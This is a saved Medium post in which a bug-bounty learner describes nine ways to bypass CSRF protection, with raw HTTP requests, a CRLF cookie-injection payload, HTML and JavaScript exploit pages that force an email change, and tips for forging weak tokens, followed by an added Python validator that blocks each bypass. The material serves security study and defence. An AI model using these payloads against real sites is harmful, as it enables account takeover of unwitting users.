4/9/24, 4:30 AM My methodology to bypass CSRF. Hello everyone, my name is Ahmed Farag… | by 0x7irix | Apr, 2024 | Medium

My methodology to bypass CSRF


0x7irix · Follow
4 min read · 4 days ago


Hello everyone, my name is Ahmed Farag, and this is my first blog post on my journey to
study web application vulnerabilities. I will show my methodology to bypass CSRF
protection with 9 different methods.

First, let’s learn about:

What is Cross-Site Request Forgery (CSRF)?


Cross-site request forgery (also known as CSRF) is a web security vulnerability that
allows an attacker to induce users to perform actions that they do not intend to
perform. It allows an attacker to partly circumvent the same origin policy, which is
designed to prevent different websites from interfering with each other.

How does CSRF actually work?


There are some conditions that must hold for a CSRF attack to be possible:

An action: there must be an API call or POST request that an attacker can take
advantage of. The action can be anything, such as changing the email address,
resetting the password, updating the profile, enabling 2FA, etc.

Cookie-based session handling: the application must rely only on session cookies to
identify which user made the request. There must be no other mechanism in place to
track the user's request, and no extra protection such as asking a secret question
before an update.

No unpredictable parameters: the request that performs the action does not contain
any parameter whose value an attacker cannot guess or brute-force. Example: if you
enable 2FA, the application is likely to ask you to confirm your password, so in that
case the attacker cannot successfully use CSRF because they do not know the password.

Bypass CSRF Protection

Bypass Method-1
First step: check whether the server only validates the token.

Check whether the token is constant for every request I send. If the token never
changes, I can say I have a CSRF vulnerability.

POST /my-account/change-email HTTP/2
Host: test.com
Cookie: session=Bahclb54I2oDaJtDBtqTX9ZvXvl432NQ
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: https://test.com
Referer: https://test/my-account?id=irix
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

email=test%40test.com&csrf=Yl1zlDXaJsflSqKqBVZtN9bK3MMjyXhN

Bypass Method-2
Delete the value of the token and send the request. If the response says the CSRF
token is missing, try deleting the whole parameter and sending the request again. If
the response is 200 or 302, you have a CSRF vulnerability.

Try this: csrf= (an empty value), or only the email parameter in the request body.

The response is:
HTTP/2 302 Found
HTTP/2 200 OK

Bypass Method-3
Try changing the token to any other value and send the request; the server may not
check the token's value at all, only that some value is present.

Bypass Method-4
If the server checks two values, such as csrf and csrfKey, the two values are validated
against each other, and csrfKey is only stored in a cookie, we can use a header (CRLF)
injection in a URL to set csrfKey in the victim's browser, like this:

/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None

The exploit code for this case (the img URL carries the same Set-Cookie payload shown above):

<html>
  <body>
    <form action="https://test.com/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="irix&#64;irxi&#46;com" />
      <input type="hidden" name="csrf" value="irix" />
      <input type="submit" value="Submit request" />
    </form>
    <img src="https://test.com/?search=test%0d%0aSet-Cookie:%20csrfKey=YOUR-KEY%3b%20SameSite=None" />
  </body>
</html>

Bypass Method-5
Try changing the request method.

Bypass Method-6
If you change the request method and the server refuses it, try overriding the method
instead: keep the changed method and add the _method parameter to the request in Burp:

GET /my-account/change-email?email=irix@irixt.com&_method=POST HTTP/1.1

exploit code:

<script>
document.location = "https://test.com/my-account/change-email?email=test@te
</script>

Bypass Method-7
Create a new account and send the request; intercept it, take the token, and drop the
request. Then add that token to a request made from a different account.

Bypass Method-8
Many web applications use a CSRF token with a static part and a dynamic part. Take
the example below:

CSRF Token : ZkfcxrWQ9CeoefwlwXuIXofKB6Vnk6t7jA9n2zxG

In this CSRF token, the first 20 characters are static, i.e. they are the same for all
users registered on the web application, and the next 20 characters are dynamic,
which means the last 20 characters differ for every user. So what you can do is keep
the static characters of the CSRF token the same and use random text for the 20
dynamic characters. If the server accepts the CSRF token, you have successfully
bypassed the CSRF protection.

Bypass Method-9
Check the token's randomness, and use Burp to automate this randomness test to see
whether the token is weak or not and try to crack it. Remember to also check whether
the CSRF token is just a normal hash such as MD5; if it is actually a common
algorithm, you can try creating a new token using that hash algorithm and replace the
token. Also try changing the User-Agent to a mobile user agent and see if the request
is accepted.
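The nine bypasses above all come down to a handful of server-side validation mistakes. The following is an added example written for this post (not the author's code or any framework's API): a Python validator that refuses each bypass, with a constructed request dict of the shape {"method", "query", "form", "headers"} and the assumed override names _method / X-HTTP-Method-Override.

```python
import hmac
import secrets

# Verbs that must never change state; Method-5 relies on a server that lets them.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
# Assumed override names honoured by some frameworks (Method-6); refused here.
OVERRIDE_PARAM = "_method"
OVERRIDE_HEADER = "x-http-method-override"


def issue_token(session: dict) -> str:
    """Fresh, fully random token bound to the server-side session.
    No static prefix (Method-8), not a hash of guessable data (Method-9)."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def validate_state_change(session: dict, request: dict) -> tuple[bool, str]:
    """request is a constructed dict: {"method", "query", "form", "headers"}.
    Returns (allowed, reason) so the caller can log every refusal."""
    form = request.get("form", {})
    query = request.get("query", {})
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}

    # Method-5: a state change over a safe verb is refused outright.
    if request["method"].upper() in SAFE_METHODS:
        return False, "state change over safe method"
    # Method-6: refuse any attempt to rewrite the verb via parameter or header.
    if OVERRIDE_PARAM in query or OVERRIDE_PARAM in form or OVERRIDE_HEADER in headers:
        return False, "method override not allowed"
    # Methods 2 and 3: the token must be present, non-empty and actually compared.
    submitted = form.get("csrf")
    if not submitted:
        return False, "missing csrf token"
    # Methods 4 and 7: the expected value lives in the server-side session, not in
    # a cookie the client can plant, and is never shared between accounts.
    expected = session.get("csrf_token")
    if expected is None:
        return False, "no token issued for this session"
    # Methods 1 and 9: constant-time comparison of the whole token, no partial match.
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "token mismatch"
    return True, "ok"


if __name__ == "__main__":
    sess = {}
    tok = issue_token(sess)
    print(validate_state_change(sess, {"method": "GET", "query": {"_method": "POST"}}))
```

Each refusal reason is distinct, so logging it gives a detection signal for which bypass is being attempted against the endpoint.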

LinkedIn profile : @irix

Facebook profile : @irix

Csrf Token Csrf Bug Bounty Csrf Attack Csrf Bypass
